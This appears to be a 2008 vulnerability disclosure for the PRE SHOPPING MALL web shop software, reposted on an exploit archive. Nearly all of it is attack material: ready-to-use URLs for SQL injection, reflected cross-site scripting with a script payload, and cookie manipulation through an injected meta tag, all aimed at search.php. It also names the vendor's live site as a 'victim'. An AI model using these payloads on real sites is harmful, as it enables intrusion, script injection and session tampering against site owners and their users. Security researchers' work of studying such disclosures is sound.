Home / os / win10

preshoppingmall-cmsqlxss.txt

Posted on 01 December 2008

#########################################################
---------------------------------------------------------
Portal Name: PRE SHOPPING MALL
Vendor : http://www.preproject.com/
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,CM,XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/search.php?search=[SQL]&submit=Search

[XSS]:
http://site.com/[Path]/search.php?search=>'><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=Search

[CM]:
http://site.com/[Path]/emall/search.php?search=111-222-1933Pouya@yahoo.com&skip=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'
>
---------------------------------

Victem :
http://preproject.com/emall

 

TOP